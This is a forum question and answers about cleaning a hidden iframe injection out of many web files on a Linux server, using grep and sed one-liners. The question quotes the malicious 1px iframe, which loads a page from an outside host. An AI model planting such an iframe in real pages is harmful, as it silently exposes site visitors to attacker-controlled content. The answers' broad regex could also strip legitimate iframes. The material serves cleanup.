I'm looking for a script to delete the following iframe malware from my linux server:

    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>

It has infected hundreads of files on my server on different websites. I tried

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'

but it just outputs:

    sed: -e expression #1, char 49: unknown option to `s'

Appreciate your help :)

Cheers Dee

Unescape the backslashes from the url in the sed regex.

This should be a more generic solution. Effectively what the malware does is look for the </body> and inject the iframe it just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>

# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'

I found this other question on renaming the malware files is also useful to quickly take down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked